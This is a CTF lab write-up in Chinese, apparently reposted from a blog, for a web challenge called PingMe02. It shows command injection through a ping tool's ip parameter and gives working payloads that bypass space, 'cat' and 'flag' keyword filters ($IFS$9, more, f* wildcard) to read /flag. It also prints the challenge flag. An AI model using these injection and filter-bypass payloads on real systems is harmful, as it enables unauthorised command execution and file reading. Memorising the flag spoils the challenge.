青少年CTF-qsnctf-Web-PingMe02

2023-12-20 18:21:37

题目环境:
image.png

题目难度:★
题目描述:诶?又是一道Ping题目诶!

image.png

给了一个ip参数

传参:

?ip=1.1.1.1

image.png

有回显结果
使用英文分号";"进行连接后续命令

列出此路径下的目录和文件

?ip=1.1.1.1;ls

image.png
列出根目录下的所有目录和文件

?ip=1.1.1.1;ls /

image.png

不能有空格,空格被过滤

使用IFS绕过空格

IFS是Shell中的一个环境变量,它代表了Shell的内部字段分隔符。IFS的默认值是空格符、制表符和换行符,这些字符用于将输入行分割成字段,以便Shell可以对它们进行处理。在某些情况下,如果需要以空格为分隔符进行分割,可以使用IFS代替空格。

?ip=1.1.1.1;ls$IFS$9/

image.png

找到了flag文件

查看flag内容:

?ip=1.1.1.1;cat$IFS$9/flag

image.png

不能cat,cat关键字被过滤

使用命令more绕过过滤

?ip=1.1.1.1;more$IFS$9/flag

image.png

发现flag!flag关键字被过滤

使用特定符号绕过过滤

?ip=1.1.1.1;more$IFS$9/f*

"*"这个符号是查看f开头的所有文件,因为根目录下只有flag这一个以f开头的文件,故可以用此符号进行绕过

image.png
得到flag:
qsnctf{623024de-f68b-499e-a8a1-713864126b43}

文章来源:https://blog.csdn.net/m0_73734159/article/details/135112330
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。